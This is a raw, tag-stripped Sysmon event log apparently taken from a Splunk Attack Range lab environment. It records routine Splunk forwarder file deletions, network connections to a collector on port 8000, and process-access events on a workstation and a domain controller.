Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BC3E05602E49AA45FD13A265D76FC3D,SHA256=16EE7D7A5F39C8A3DEB7D6FC227FECEB4FF51F2671A5295F6267FC5447A401A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245175Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:00.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71CD6E1FD74C0531537AB68E2CEEE5D2,SHA256=26516CF12AFDC2BF7B6E134CF8C9BD20956C12914313ECF3D4FF7423F63A4C79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060605Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:01.903{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D38D5B1D655B4BFCBE096D18478DA07,SHA256=FAD0C3E895C325A4FB34F0BB1CAC838F227DFEC65FEC9000A504B792765E2B5D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060604Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:58.067{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54747-false10.0.1.12-8000- 23542300x8000000000000000245176Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:01.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36F5DB0135A3D6CA68B8E6560D9532E9,SHA256=D0ABAC58C2854E584382293ABF61A6688499A586CD9DCE01BBF28CE21A715B2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245180Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:02.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD2051B510E44B5E23144B62B8F1ED57,SHA256=DC4285A7B673C86DF4B19CD81FE508AB07B11AD12F678D6FC2706EBA1CB036F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245179Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:01.550{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64736-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245178Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:02.340{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7565615333660CC28C2BAD753F2E9FA3,SHA256=79ACB9848900F6750CC0414BF3B6AD6F81665B13017915E91EA6DE2805829C8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245177Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:02.340{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A52A41EDD71E56A5B7D421502D40A549,SHA256=985B8510BE467019A40BDFB9FD148651644682541338341BC0FBD893C18889EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060606Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:03.262{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=135866B9C33EC66AB20525F671D1F0A5,SHA256=27F07604DB6808A6A609A55EB0A8D34B6BD4A492754BFC9603B6F5A7A859FF03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245181Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:03.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F49D0E718CFF24FE667A194EC43B2360,SHA256=9DA356D267FEEF913C52A39EC1BCFBC2FC3BC143911D22DC85A8E20621F5330D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060607Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:04.622{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=443CBDBF53DA152E21ECCED3410FACB4,SHA256=C0A13D319EB2A02BB044A6FDA14830F9375D2ACC51A1DE16BFAF6747CFC464B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245182Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:04.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8305EAD58FABB070540A151092D87741,SHA256=BA5C5AEB812475DDD506919743827029C365AF3D10DA1ED417C35CF225CFF801,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060608Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:05.966{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4358CB58512EC400FFB8CE798002E12E,SHA256=95E464C96D3A6D1D4310BF5B7ADE93995E8337061657595C0BC5EC1D91A54877,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245183Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:05.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=964301A533DA74319C1587A01755DC32,SHA256=82BDABF8EFD14E0DCC1223FA418827FA0F352E9E2404038164D988F6CD43C440,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245184Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:06.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=353C309126CE5516222F5F6E08112FAB,SHA256=7D58EBB555B4B94E971858E4870F4916C10FCCEF869EE914AF438A5A084CDB9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060610Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:07.325{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37E2F15D518918A16189783F7D8E8CFD,SHA256=CC4810337650608371E72A64859BE953CB16443592B26FF8C548FD160887D4EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060609Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:03.958{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54748-false10.0.1.12-8000- 23542300x8000000000000000245185Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:07.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40B5AD8A29D82B41B439E4770BA0D6A2,SHA256=3E3754ABD82EF51094CF5EA922ED313DBA12E6E7CD8AE05EE49F0BB3D830EE76,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245189Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:07.566{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64737-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245188Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:08.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D675969C259995CE0F89A49453BF4431,SHA256=EBE2216FAD045A29A1CE414984E1943C0BF60AC098A0685EBFDCA45E77470FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245187Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:08.184{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62C7656BA8BBC92A10AAD2DACE2BDF2A,SHA256=7720F4CEE880751C4FC2BD038B22CE9502F95E9F68FA3603C9B75D3117168966,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245186Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:08.184{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7565615333660CC28C2BAD753F2E9FA3,SHA256=79ACB9848900F6750CC0414BF3B6AD6F81665B13017915E91EA6DE2805829C8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060611Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:09.326{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E661848367B77E3CEADB4CB67C7B688F,SHA256=BA86DDA66FD95F8250B89B7E8E2D3B4DE4FF1717E7E82469F25A0BCD94E42C8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245190Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:09.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D65F5CF2FE211AA8F2F452F2544320BD,SHA256=41B32B031D216ED6E5B459A94EC44249C9A3979EE441F7B909861AF588F39C7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245191Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:10.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F95D2CA37B639B14C39550B6B3AC7458,SHA256=788FE3D50AA25272536F8E20FD69B3061BF731591391C011E860A6038488D6F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060613Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:11.732{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D453245699F79C04A0C2CDA92F75976,SHA256=209C143467179F2112AE04A52CE4F19F50591E16E768E4CB761E0B9360255377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060612Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:10.998{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=190309E0F3179752A34D8515559D6BA6,SHA256=B0A2D0020BD6D841A8E789708E36F31E08886706F03953796C2511C018F92155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245192Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:11.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF061A4335436C6AA9FA5357C02C0465,SHA256=AAF995F7C926C4284BA5ED9269D99599B2E33D90C2B7C8CFC449611045C8BF64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060615Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:12.405{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F6A56DCAB500C25708EAA2E320CE6AD,SHA256=4C3BBDC5822D0C3A42DA6C1C94FEFFD17E80A10559DC5BBF06BB8CD3D5F589B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060614Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:09.083{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54749-false10.0.1.12-8000- 23542300x8000000000000000245193Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:12.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFAFC863A8FA688FA39FB653D980576C,SHA256=970D1E3565541F1B2B845B841A8A758C91F140D6FA668A87CB85AABAC1288EC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060616Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:13.764{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92C77C47D27531DE28FAC1D7BDE828C6,SHA256=8C6003A7A888D053863DCF06E22B390FC1A5909B6F86B23E4F0A3C9DC055571E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245196Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:13.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90639BB247CD45D7AFC0CE71BD12B4FD,SHA256=1711DCDDCEC15E14D1DDC008653499DCAF69DAD43B140EFDC04326375F532AA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245195Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:13.262{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAE606E129A6A18B5AABE9C606F85572,SHA256=4EEB2DDF4586BD1BBB3B28CD6D8B5BAFBEBB3B917187360FA5391D043EEC50E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245194Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:13.262{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62C7656BA8BBC92A10AAD2DACE2BDF2A,SHA256=7720F4CEE880751C4FC2BD038B22CE9502F95E9F68FA3603C9B75D3117168966,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245198Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:14.872{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57576C1182EE40E401076B7E8E3ED6D1,SHA256=BB3E40B497E67B92142A9367CC0D398CA976AED71087091E1704659CD67A5D5E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245197Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:12.628{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64738-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060617Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:15.139{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EFFFB3DE51DCFB99ABC4F53470B96C9,SHA256=0D1E8F3AC172708E47457671F5B6B03860FE723B8A9728512FACD62BEA239E00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245199Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:15.874{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=172584C3B1C382378BE01CBFCC631FAE,SHA256=FC7152DBA3E0B856A8CA031896B5B6F1E54B3EB29CFD8003E2DBF6CF646ECBCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060618Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:16.499{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A2599211CC60AA85C2F9CAC12A0AB5,SHA256=47BE158D8710968E4D3178BC9B82B5666941E793F8604DAEDF3A20369FB8923E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245200Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:16.875{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E073F7563D0AD116065D1F95337CC054,SHA256=0E0C3536464F34798533C696A1E483A1CF65C75849F3F5D3CCF1B68780C24D3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060619Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:17.843{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=959299BD1CF1211824BB8454C04AD4D1,SHA256=3C41CF367C8D3A0B3A7C568DFA21E06493E783629493E9DB19A81A89D83F469F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245201Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:17.890{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC5B521D3B6962FF27FBEA511E81DAF,SHA256=C657A455F538ACD54E66ED6CF123BDB9DE2794D5CB44C1B0E20F8186B0D81DFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060620Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:14.942{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54750-false10.0.1.12-8000- 23542300x8000000000000000245202Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:18.890{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26976D5BFB609F69F9D6415B383A3262,SHA256=FBE28736E1C973E070F5AE96EDD67EEE2E5FBFD49812CEBA646FD5B3AC9E8CDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060637Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.887{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-512B-6063-0C01-00000000AF01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060636Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.887{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060635Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.887{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060634Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 